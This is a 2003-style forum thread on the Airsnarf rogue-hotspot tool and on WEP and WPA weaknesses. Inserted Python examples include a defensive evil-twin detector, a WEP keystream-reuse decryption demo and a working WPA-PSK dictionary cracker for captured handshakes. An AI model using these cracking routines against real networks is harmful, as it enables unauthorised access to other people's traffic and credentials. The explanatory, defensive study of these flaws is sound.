IamZed Premium join:2001-01-10 Dayton, OH
Possible, but not probable
The creation of false sign-in pages seems a bit obtuse. It's not something you do as a drive-by. I would hope people become familiar enough with this that, when everyone is booted, they let a sacrificial lamb try to log back on first.
-- A thing worth doing is worth doing to excess.

oliphant5 Got Identity? Premium join:2003-05-24 Corona, CA
Re: Possible, but not probable
Exactly... this isn't anything new. This is just a twist on the spoofed email looking for AOLers' account info. Like most "hacks" this requires end-user carelessness in order to succeed.
-- Don't get it, demand it! The Anime Network »www.theanimenetwork.com/index.html And something pretty good from the Cooler »elev.ru.orebro.se/ru0369/HAHAHAHA.MPG

LBDSL Lightning Bolt VIP join:2002-01-07 Auburn Hills, MI
Someone will always crack it.
No matter what you build, someone will crack it. It is the way the world works.
-- Lightning Bolt Technologies

TexasGuy 49 States And Texas Premium join:2002-12-02 Houston, TX
Re: Someone will always crack it.
said by LBDSL: No matter what you build, someone will crack it. It is the way the world works
Right, go hack a 256-bit DES key. Right. Easier to storm the safe and break it open.
-- Who drank has died, who drinks will die. Is he immortal who is sober?

skyfreedomdo Premium join:2003-01-01 Boise, ID
What do u mean 802.11b is not secure?!!!
I got WEP to protect me!!!!

ctceo Premium join:2001-04-26 South Bend, IN
Re: What do u mean 802.11b is not secure?!!!
Apparently you need to open your other eye.

skyfreedomdo Premium join:2003-01-01 Boise, ID
Re: What do u mean 802.11b is not secure?!!!
Apparently you need to c the humor!

ctceo Premium join:2001-04-26 South Bend, IN
Re: What do u mean 802.11b is not secure?!!!
Humor observed...

kba4 join:2001-10-23 Akron, OH ·RoadRunner Cable
hot-spot providers take heed!!
We will not let you provide free/cheap access to just the 'special' individuals you know about! You have been warned!!
Seriously, can anyone honestly have expected wi-fi to ever be secure? How can you make a broadcast 'secret' anyway? It's just an arms race between the 'hackers' and the providers/developers... I hope anyone investing in the hot-spot idea knows this going in, and will continue to fund what could someday become a utopia of free access anywhere in the country, even the world. I don't care how much you encrypt the data: if it's broadcast, it can be seen by anyone, and the 'hacker' actually prefers not to be paid for his work, unlike the 9-5 sysadmin who 'secures the network'. Oh well, someone with more sense, please add to the discussion; I just saw the story and felt like posting :)
-- the USA is a weapon of mass destruction.

lazarus_ join:2002-08-31 Resolute, NU
Re: hot-spot providers take heed!!
said by kba4: We will not let you provide free/cheap access to just the 'special' individuals you know about! You have been warned!! Seriously, can anyone honestly have expected wi-fi to ever be secure? How can you make a broadcast 'secret' anyway? It's just an arms race between the 'hackers' and the providers/developers... I hope anyone investing in the hot-spot idea knows this going in, and will continue to fund what could someday become a utopia of free access anywhere in the country, even the world. I don't care how much you encrypt the data: if it's broadcast, it can be seen by anyone, and the 'hacker' actually prefers not to be paid for his work, unlike the 9-5 sysadmin who 'secures the network'. Oh well, someone with more sense, please add to the discussion; I just saw the story and felt like posting :)
Like my networking prof always says: "Anyone with a wet finger or metal clothing hanger can pick up your signal.."
Using WiFi you have the portability and ease of install but have to give up security.. If you have important info going over the network you should never use WiFi..

kapil The Kapil join:2000-04-26 Chicago, IL
Where...
...can I get me a copy of this thing?

Vamp 5c077 Premium join:2003-01-28 MD
more hackers
Listing the name of the tool publicly is only educating more people in hacking..

korym Go Wisp's ExMod 1999-03 join:1999-12-23 Richmond, VA
Re: more hackers
Oops.

Sisqo World Champs. Babe Who? Premium join:2002-08-14 Methuen, MA
Re: more hackers
said by Vamp: by listing the name of the tool publicaly is only educating more people in hacking..
This stinks, so how can someone really protect themselves? Now does this apply only to users that are using hotspots?
-- No it's not a payphone, it's a portable phone!

TheNerdShow join:2003-11-16 Anchorage, AK
edit: November 26th, @06:54PM
Re: more hackers
This applies to home and business networks using popular wireless networking gear and using a form of encryption or password protection. The issue is moot since most people don't even bother to password-protect their networks.
-- »thenerdshow.com »nerds.tk

gdead @eisg.net
Defensive Techniques
Howdy. So I've been involved in the Airsnarf project (I presented with Beetle at BlackHat Federal in DC a few months ago on the project). I've got a few things to say about this tool and the write-up about this.
First off, the type of attack that Airsnarf carries out is not rocket science. It is not about breaking encryption but rather about tricking the client. The attack can be fully explained in about 5 minutes to a level that anyone with familiarity with 802.11 can fully understand.
HOWEVER, not a single OS vendor, security tool provider, or driver vendor alerts the user that this kind of attack is being performed. This is completely a layer 2 attack that should be caught by any wireless security tool. At the time of our talk at BH, nothing existed that would tell the user "hey, bad things are afoot... you should stop using this network". Airsnarf is a wake-up call to the vendors.
To that end, we also wrote the Hotspot Defense Kit (HSDK). It's designed to alert the user that there is a layer 2 attack underway. It can be downloaded from the Airsnarf page. Currently it only runs on OS X, but we are working on a Windows port.
Finally, I am not a 3l337 blackhat hacker. I coauthored 802.11 Security through O'Reilly. I also try to educate as many people as I can about wireless security through talks, mailing lists, etc.
later

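The layer 2 signals gdead's post says a client-side tool should watch for (the attacker kicks everyone off, then a second radio starts answering to the hotspot's network name) can be checked without any cryptography at all. The following is an added example written for this page, not the Shmoo Group's HSDK or any other tool's code: it runs over already-parsed management-frame records constructed inline, and the deauth threshold and window are assumptions rather than values taken from any tool.

```python
"""Layer 2 "evil twin" / hotspot-attack detector, in the spirit of what the
Hotspot Defense Kit is described as doing. Added example, not the Shmoo
Group's code: it consumes already-parsed management-frame records rather
than a live capture, and the thresholds below are assumptions."""
from collections import defaultdict

# Record shape: (seconds, frame_type, ssid, bssid, channel); ssid is None for deauths.
# Constructed sample: a genuine hotspot AP, then a spoofed deauth flood, then a
# second AP beaconing the same SSID, then the original BSSID cloned on another channel.
GENUINE_AP = "00:0c:41:aa:aa:aa"
ROGUE_AP = "00:11:22:bb:bb:bb"
SAMPLE_FRAMES = (
    [(t / 10, "beacon", "tmobile", GENUINE_AP, 6) for t in range(0, 50)]
    + [(5.0 + n / 20, "deauth", None, GENUINE_AP, 6) for n in range(12)]
    + [(6.0, "beacon", "tmobile", ROGUE_AP, 11)]
    + [(6.5, "beacon", "tmobile", GENUINE_AP, 11)]
)


class EvilTwinDetector:
    def __init__(self, deauth_threshold: int = 10, window_s: float = 2.0):
        self.deauth_threshold = deauth_threshold
        self.window_s = window_s
        self.bssids_by_ssid = defaultdict(set)   # which BSSIDs claim each SSID
        self.channel_by_bssid = {}               # last channel each BSSID beaconed on
        self.deauth_times = defaultdict(list)    # recent deauth timestamps per BSSID
        self.alerts = []

    def feed(self, frame):
        t, kind, ssid, bssid, channel = frame
        if kind == "beacon":
            claimants = self.bssids_by_ssid[ssid]
            if claimants and bssid not in claimants:
                # Same network name from a new radio. Legitimate multi-AP networks
                # do this too, so alone it is a weak signal; right after a deauth
                # flood it is not.
                self.alerts.append(("new-bssid-for-ssid", ssid, bssid))
            claimants.add(bssid)
            previous = self.channel_by_bssid.get(bssid)
            if previous is not None and previous != channel:
                # A BSSID that suddenly beacons on another channel is most likely a clone.
                self.alerts.append(("bssid-channel-change", bssid, channel))
            self.channel_by_bssid[bssid] = channel
        elif kind == "deauth":
            recent = self.deauth_times[bssid]
            recent.append(t)
            while recent and t - recent[0] > self.window_s:
                recent.pop(0)
            if len(recent) == self.deauth_threshold:
                # Deauthentication frames carry no authentication in 802.11, so a
                # burst of them "from" the AP is the attacker booting everyone off.
                self.alerts.append(("deauth-flood", bssid, len(recent)))
        return self.alerts


def analyze(frames):
    """Run the detector over a sequence of records and return its alerts."""
    detector = EvilTwinDetector()
    for frame in frames:
        detector.feed(frame)
    return detector.alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_FRAMES):
        print(alert)
```

On the constructed sample this raises a deauth-flood alert first, then the new-BSSID and channel-change alerts for the second radio. Feeding it real frames needs a card in monitor mode and a parser for beacon and deauthentication frames, which is exactly the part no OS of the time exposed to users.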
korym Go Wisp's ExMod 1999-03 join:1999-12-23 Richmond, VA
Re: Where...
»airsnarf.shmoo.com/
Also check out Airsnort too.

cinnamon How Smart Is Your Card? Premium join:2002-01-19 Tulsa, OK
Re: Where...
Of course from The Shmoo Group. You are running Red Hat Linux 9.0, aren't you?

aSic Premium join:2001-05-17 Wakulla, FL
Re: Where...
lol... the video card makes no difference at a command line..
...unless you're the wussy type that *NEEDS* X to do anything useful.

Mr_Stealth Premium join:2001-05-18 Lucasville, OH ·RoadRunner Cable ·Verizon Online DSL
Re: Where...
lol, I just need to take the time to get it running on the command line and then find the drivers. I'm fairly certain there are some working ones available,
but I just tried to take the easy way out with Red Hat and Mandrake... got through the install and it gave me a blank screen when it went to configure the video card.
Not like we really need to crack WEP keys... from what I have seen, most people don't have enough sense to use it anyway.
-- Say goodbye to your privacy and security. Say no to TCPA/TCG/NGSCB

skyfreedomdo Premium join:2003-01-01 Boise, ID
How long would it take to...
... break WEP 64 bit and 128 bit? Any ideas or *shhh* experiences?

skyfreedomdo Premium join:2003-01-01 Boise, ID
Re: How long would it take to...
Good point on WEP not being used by many. How about TKIP (Temporal Key Integrity Protocol)? Has anyone read about or applied it?
-- SKYFREEDOM NETWORKS Whatever the angle; We've got you covered.

skyfreedomdo Premium join:2003-01-01 Boise, ID
Re: How long would it take to...
I like MAC filtering but there's always a chance of MAC SPOOFING! But you are right, common sense and, if I might add, knowledge of the enemy out there or within will prevail.
-- SKYFREEDOM NETWORKS Whatever the angle; We've got you covered.

BeesTea Network Janitor Premium,VIP join:2003-03-08
Re: How long would it take to...
Sure, changing your MAC is not hard. That isn't spoofing and it isn't "defeating" anything at all. You're literally becoming a device allowed to connect to the WAP. Now here's the interesting part. Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP?
On the issue of WEP, it isn't intended to provide strong cryptographic communication. WEP means "Wired Equivalent Privacy". That is, just as a wire holds the signal, keeping it from being intercepted easily, WEP keeps the signal from being eavesdropped on easily.
This is another example of why the physical layer is NOT where security is applied for the average network. Wireless or otherwise.
Cheers, -BeesT
-- 2b2b2b415448300d

NotAHacker @dbma.com
Re: How long would it take to...
How hard is it to spoof a MAC address? Well, if you have the software and knowledge to determine WEP keys, you already have everything you need to also learn all the authorized MAC addresses on that WLAN.
I'm not going into further detail, even though the info is widely available on the Internet.

BeesTea Network Janitor Premium,VIP join:2003-03-08
edit: November 26th, @08:10PM
said by bmn: It would involve sniffing traffic on that WLAN. You would then be able to detect the MAC address of a system associated with the WLAN that is your target. I haven't actually done it (over the black hat stuff), so the mechanics of doing it are not 100% in my skillset, but the conceptual process can be found elsewhere.
That's an interesting concept. It was my understanding that by frequency variation the clients were not able to see one another, hence the need for a WAP. Does this require the NIC to be in ad-hoc mode? I wish I had more than just my laptop running on 802.11 here to play with.
I've been looking for a bit this evening and can't find any method that doesn't require using crazy radio frequency tools. There are some funky white papers on parsing radio streams in the unlicensed frequency ranges but they seem to be more "find the person snooping your cordless phone" type stuff.
If you happen to find anything on this please let me know, as that's not at all how I understood it to operate.
Cheers, -BeesT
OK, I've scoured the Seattle wireless mailing list archive and it seems my understanding of how this works is based on modern 802.11 card implementations. Newer cards apparently make it non-trivial to intercept packets on the way to the WAP or vice versa. Presumably older cards with new firmware would also reduce this risk.
-- 2b2b2b415448300d

sporkme drop the crantini and move it, sister Premium,MVM join:2000-07-01 Netcong, NJ
Re: How long would it take to...
said by BeesTea: Now here's the interesting part. Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP?
Just run your favorite sniffer for a while. The frame headers are NOT encrypted when WEP is enabled. So it's actually pretty easy. I've been toying with "KisMac" and it's pretty simple. It's totally point-n-drool. Right-click on a node and there's a menu item "Find Key". With a moderate amount of traffic this happens in less than half an hour.
WEP is fundamentally broken. I don't mind the idea of encrypting at L2, but they chose a very weak algorithm.
-- just a minute

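Two of the points made above, that WEP leaves the 802.11 header (and so every station's MAC address) in the clear, and that its RC4 construction is weak, can be shown in a few dozen lines. The block below is an added example written for this page, not code from the original post, from KisMac or from any other tool; the WEP key, the repeated IV and both frame payloads are constructed. It does not implement the statistical key-recovery attack the sniffers use; it shows the more basic flaw that WEP's 24-bit IV space makes keystream reuse routine, and that one known plaintext under a reused IV decrypts every other frame sent under that IV without ever learning the key.

```python
"""RC4 keystream reuse under WEP, as an added example that is not code from
the page or from any tool it names. Everything here is constructed: the WEP
key, the repeated IV and both frame payloads. Only the frame body is modelled;
the 802.11 header carrying source and destination MACs is never encrypted by
WEP, which is why harvesting allowed MAC addresses needs no key at all."""
import math
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4: key scheduling followed by the pseudo-random generator."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: a plain CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Body = IV (3 bytes, sent in the clear) || RC4(IV||key) XOR (plaintext||ICV).
    The key-ID byte that follows the IV on the wire is omitted here."""
    keystream = rc4_keystream(iv + root_key, len(plaintext) + 4)
    return iv + xor(plaintext + icv(plaintext), keystream)


def wep_decrypt(root_key: bytes, body: bytes):
    """Receiver side with the key: returns (plaintext, icv_ok)."""
    iv, ciphertext = body[:3], body[3:]
    pt_icv = xor(ciphertext, rc4_keystream(iv + root_key, len(ciphertext)))
    plaintext, got_icv = pt_icv[:-4], pt_icv[-4:]
    return plaintext, got_icv == icv(plaintext)


def recover_from_iv_reuse(known_body: bytes, known_pt: bytes, target_body: bytes):
    """Attacker side, no key. Two bodies with the same IV were encrypted with the
    same RC4 keystream:  C1 xor (P1||ICV1) = keystream,  P2||ICV2 = C2 xor keystream.
    Returns (recovered_plaintext, icv_ok)."""
    if known_body[:3] != target_body[:3]:
        raise ValueError("IVs differ: no keystream reuse to exploit")
    if len(target_body) > len(known_body):
        raise ValueError("only as many keystream bytes as the known frame yields")
    keystream = xor(known_body[3:], known_pt + icv(known_pt))
    recovered = xor(target_body[3:], keystream)
    plaintext, got_icv = recovered[:-4], recovered[-4:]
    return plaintext, got_icv == icv(plaintext)


def expected_frames_until_iv_collision() -> float:
    """Birthday bound on the 24-bit IV space: about sqrt(pi/2 * 2^24) frames,
    so a busy AP repeats an IV within minutes even with random IV selection."""
    return math.sqrt(math.pi / 2 * 2 ** 24)


# Constructed demo values; the attacker never sees WEP_KEY.
WEP_KEY = bytes.fromhex("0102030405")                         # 40-bit key
REUSED_IV = bytes.fromhex("0c3a9f")
KNOWN_PT = b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + b"\x00" * 40  # ARP-shaped frame the attacker sent itself
SECRET_PT = b"GET /login?user=bob&pw=hunter2 HTTP/1.0"         # a victim frame under the same IV


def demo():
    c_known = wep_encrypt(WEP_KEY, REUSED_IV, KNOWN_PT)
    c_secret = wep_encrypt(WEP_KEY, REUSED_IV, SECRET_PT)
    return recover_from_iv_reuse(c_known, KNOWN_PT, c_secret)


if __name__ == "__main__":
    print(demo())
```

The ICV check on the recovered frame passes because CRC-32 is linear and keyed by nothing, which is also what lets an attacker flip bits in a WEP frame and fix up the ICV. The time-to-crack figures quoted in this thread come from a different weakness (RC4's key-scheduling bias over many IVs), but the reuse shown here is why "WEP with a bigger key" was never the fix.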
aitech Guru. Kneel join:2000-12-19 Boston, MA
Re: How long would it take to...
Has anyone gotten a successful port of Kismet to Windows yet, or is it still alpha?
And does anyone have any idea when NetStumbler .4 is coming yet?

DenverDialup join:2003-06-06 Littleton, CO
Re: How long would it take to...
Well, consider too that WPA is becoming the new standard in wireless security. I don't see why Shmoo has to go write another hacking/phreaking/wardriving tool to "prove an inherent insecurity in 802.11b"... anyone who's spent more than a day looking at wireless technologies today knows how insecure it is. Why not take that effort and translate it into something more useful, like actually working to make WiFi more secure?
-- "Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." -- Rich Cook

shmoe1 join:2003-09-06 Fremont, CA
Re: How long would it take to...
One article about WPA vulnerability I've encountered was by Robert Moskowitz, senior technical director at ICSA Labs.
It details problems with pre-shared keys of fewer than 20 characters with simple passphrases that were vulnerable to a dictionary attack. Complex passphrases longer than 20 characters seem to be less of a security issue.
Also, I read that WPA is just as vulnerable as WEP to denial-of-service attacks.
If others can point to other articles or specific problems it would be useful.
Thanx

gruggni Oxygen Gets You High join:2003-07-28 Corpus Christi, TX
No need to panic
Tools like this have been around for a while. You only need to use the tool if someone has encryption turned on. The majority of residential wifi networks are already open. Really no need for worries. Very few wifi networks are actually encrypted.
Tools like this are used to break encryption. Anyone with malicious intent will just go to the open wifi network instead of an encrypted one. Breaking encryption takes time. How else do you test that encryption works? You make a tool to break it. If someone is trying to sell me wifi equipment and they say it's secure, I want a way to test the encryption instead of taking someone's word for it.
-- When I read about the evils of drinking, I gave up reading. --Henny Youngman

Rhobite Premium join:2002-02-24 Cambridge, MA
Re: No need to panic
This tool has NOTHING to do with breaking encryption. It's a password-gathering tool; it puts up a fake login page just like you'd get from a T-Mobile or Verizon hotspot. Hotspots don't use WEP or WPA anyway, they are unencrypted. This tool just makes it easy to set up a rogue AP and fish for people's logins. The reason you can't just passively sniff for passwords is that I assume the real login pages are sent over SSL. Although I've never used a pay hotspot so I could be wrong.

reub2000 Premium join:2001-12-28 Evanston, IL
I'll continue to use 10/100 Ethernet.
This type of attack would be impossible on Ethernet. And I get 100Mbps instead of about 50MBps.

bigdaddy17 join:2003-05-08 Miami, FL
Re: I'll continue to use 10/100 Ethernet.
So does this also affect wireless home networks too?

reub2000 Premium join:2001-12-28 Evanston, IL
Re: I'll continue to use 10/100 Ethernet.
said by bigdaddy17: So does this also affect Wireless home networks too?
I don't see why it wouldn't, since it's the same standard. (802.11g/b/a)

PhragX join:2001-11-01
Re: Playing with stuff Bill doesn't want you to have
Incorrect - there is a Windows port of AirSnort (for defeating WEP):
»airsnort.shmoo.com/windows.html
Many tools such as Ethereal/tcpdump are ported to Windows, and there is of course NetStumbler.
www.packetstormsecurity.nl have also posted (exploit) code that is easily compiled (or precompiled) for Windows systems.

dilettante join:2002-01-01 Haslett, MI
Want security? Just stay under their "radar"
I continue to use HomeRF here at home. As far as I know an 802.11 radio can't even see it. It's slow but cheap. Now to get hold of some HomeRF 2 gear!
Just doesn't always pay to be one of the cool kids I guess.
My thanks to Ashcroft or whoever chose to suppress the technology. ...tongue in cheek guys, really!

mimick @xx.lax1
broadband
Does anyone know how to open up your broadband more to get more speed?

v3xproof @af.mil
WEP vs WPA
On a not-so-busy network it could be as little as 15 minutes to crack. The reason why is a little tool called AirReply. A knowledgeable person can grab a good packet from the little traffic and just resend it over and over. The AP then sends information back over and over (generating tons of initialization vectors needed to crack the WEP key). After about 15 minutes and 300,000 replayed packets later it will only take about 30 seconds to crack the actual key.
WPA is way more susceptible to DoS attacks IMHO. Why? Because WPA does not like replay attacks. If it detects one, it will disconnect that user... get the picture. At Defcon the Shmoo Group created a "WiFi Handgrenade". lol. They took a PDA and just had it replay all traffic... You take it from there.
About actually cracking WPA. I do believe that there is only one weakness with it known as of today (at least with AES, but don't quote me on this)... users picking weak passkeys which allow it to be cracked with a dictionary file. Choosing a passkey of 60 characters with absolutely no words, numbers, upper/lower case, and special characters will make it take longer to crack. Changing your passkey often should prevent this attack. MAC filtering is bullshit.
If you want to get the most secure wireless you can, my suggestion... Use WPA or WPA2 with AES. Make the user then have to VPN to get on the network (now they have to get credentials). When browsing try to use SSL as much as possible. When chatting, try using an encrypted chat program. Etc...
Now about Shmoo, they aren't doing what they do to make people's lives miserable; they do it to educate dumb people. People that buy into any corporation's bullshit about how secure their wireless products are. And about secure wireless networks... There is one. It's called SecNet 11. It is what the government uses. I don't know much about it other than what I found on the internet. I know that a single wireless card runs in the thousands.
If you want to know why I say it's secure (for now), it's approved to transmit up to Secret. I doubt the government would allow that to be transmitted over unsecure means (at least I hope not). Hope I helped to clear up some misconceptions.

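The one WPA-PSK weakness that both shmoe1's and v3xproof's posts describe, a short dictionary-word passphrase, is an offline attack: the sniffer only needs one 4-way handshake, after which every candidate passphrase is tried against the captured MIC without touching the network. The block below is an added example written for this page, not code from either post or from any tool named in the thread. The "capture" is simulated in-process from a constructed passphrase so it runs offline; the SSID, MAC addresses, nonces, EAPOL bytes and the word list are all made up. The key derivation itself (PBKDF2 for the PMK, the 802.11i PRF for the PTK, HMAC-SHA1-128 for the WPA2 MIC) is the standard one.

```python
"""WPA/WPA2-PSK dictionary attack against a captured 4-way handshake, as an
added example that is not code from the page or from any tool it names.
The "capture" is simulated in-process from a constructed passphrase so the
example runs offline; SSID, MAC addresses, nonces, EAPOL bytes and the word
list are all made up."""
import hashlib
import hmac
from typing import NamedTuple, Optional


class Handshake(NamedTuple):
    ssid: bytes
    aa: bytes        # authenticator (AP) MAC
    spa: bytes       # supplicant (client) MAC
    anonce: bytes
    snonce: bytes
    eapol2: bytes    # EAPOL-Key message 2 with its MIC field zeroed
    mic: bytes       # the MIC the client actually sent


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The 4096 iterations are the only thing slowing a dictionary attack down,
    and since the SSID is the salt, tables can be precomputed per common SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max MACs || min/max nonces).
    Its first 128 bits are the KCK, the key that authenticates the handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)[:16]


def eapol_mic(kck: bytes, eapol_zeroed: bytes) -> bytes:
    """WPA2/CCMP: HMAC-SHA1-128 over the EAPOL frame. (WPA/TKIP used HMAC-MD5.)"""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


# Constructed network parameters.
SSID = b"linksys"
AA = bytes.fromhex("000c41aaaaaa")
SPA = bytes.fromhex("001122334455")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL2 = b"\x01\x03\x00\x75" + b"\x00" * 117     # placeholder EAPOL-Key frame, MIC zeroed
WORDLIST = ["password", "letmein", "linksys", "qwerty123", "wireless1", "welcome", "admin"]


def simulate_handshake(passphrase: str) -> Handshake:
    """What a sniffer sees of a handshake: everything except the passphrase and PMK."""
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    return Handshake(SSID, AA, SPA, ANONCE, SNONCE, EAPOL2, eapol_mic(kck, EAPOL2))


def crack(hs: Handshake, wordlist) -> Optional[str]:
    """Offline: derive PMK -> KCK -> MIC for each candidate and compare with the capture."""
    for candidate in wordlist:
        kck = kck_from_pmk(pmk_from_passphrase(candidate, hs.ssid),
                           hs.aa, hs.spa, hs.anonce, hs.snonce)
        if hmac.compare_digest(eapol_mic(kck, hs.eapol2), hs.mic):
            return candidate
    return None


if __name__ == "__main__":
    print(crack(simulate_handshake("wireless1"), WORDLIST))                      # found
    print(crack(simulate_handshake("Vq7!rp#2Ld9@kfW0s&zT3mN8xHe^bQ"), WORDLIST))  # None
```

The seven-word list finds the weak passphrase on the first run and never finds the long random one, which is the whole content of the "fewer than 20 characters" advice: the attacker's cost is one PBKDF2 per candidate, so the passphrase has to be outside any list worth building. A real capture needs the two MACs, both nonces and message 2 of the handshake, all of which are in the clear on the air; a deauth like the one v3xproof describes is how an attacker forces a client to produce a fresh handshake on demand.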